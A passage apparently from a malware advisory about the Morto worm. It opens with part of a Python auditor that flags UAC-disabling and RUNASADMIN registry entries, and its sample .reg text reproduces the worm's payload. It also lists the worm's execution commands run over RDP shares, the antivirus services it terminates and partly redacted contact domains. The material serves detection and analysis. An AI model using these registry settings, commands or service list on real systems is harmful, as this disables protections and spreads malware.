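        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            result.setdefault(current, {})
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not m or current is None:
            continue
        name = m.group(1).replace("\\\\", "\\")
        data = m.group(2).strip()
        if data.lower().startswith("dword:"):
            value = int(data[len("dword:"):], 16)
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            value = data[1:-1].replace("\\\\", "\\")
        else:
            value = data
        result[current][name] = value
    return result


def audit_reg(text):
    """Return findings: UAC switched off under the system policy key, and
    AppCompat layers that make rundll32 run elevated without a prompt."""
    findings = []
    for key, values in parse_reg(text).items():
        if key.endswith(_SYSTEM_POLICY_SUFFIX):
            if values.get("EnableLUA") == 0:
                findings.append("UAC disabled (EnableLUA=0) under " + key)
            if values.get("ConsentPromptBehaviorAdmin") == 0:
                findings.append("admin consent prompt disabled under " + key)
        elif key.endswith(_LAYERS_SUFFIX):
            for name, layer in values.items():
                if "RUNASADMIN" in str(layer).upper():
                    findings.append("RUNASADMIN layer for " + name)
    return findings


# Constructed, shortened version of r.reg for this example.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
'''

if __name__ == "__main__":
    for finding in audit_reg(SAMPLE_REG):
        print(finding)
```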

    Once files have been copied to RDP workstations, the malware will run those with the following commands:

    • “regedit /s \\tsclient\a\r.reg”
    • “rundll32 \\tsclient\a\a.dll a”

    It also terminates the following services belonging to antivirus and security software:

    • 360rp
    • a2service
    • ACAAS
    • ArcaConfSV
    • AvastSvc
    • avguard
    • avgwdsvc
    • avp
    • avpmapp
    • ccSvcHst
    • cmdagent
    • coreService
    • FortiScand
    • FPAVServer
    • freshclam
    • fsdfwd
    • GDFwSvc
    • K7RTScan
    • knsdave
    • KVSrvXP
    • kxescore
    • mcshield
    • MPSvc
    • MsMpEng
    • NSESVC.EXE
    • PavFnSvr
    • RavMonD
    • SavService
    • scanwscs
    • Shell
    • SpySweeper
    • Vba32Ldr
    • vsserv
    • zhudongfangyu

    Network Activities:

    The malware tries to contact the following URLs:

    • qf{REMOVED}.net
    • ms.ji{REMOVED}nfo
    • ms.ji{REMOVED}o.cc
    • ms.ji{REMOVED}o.be

    SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

    GAV: Morto.A (Worm)
    GAV: Morto.A_2 (Trojan)
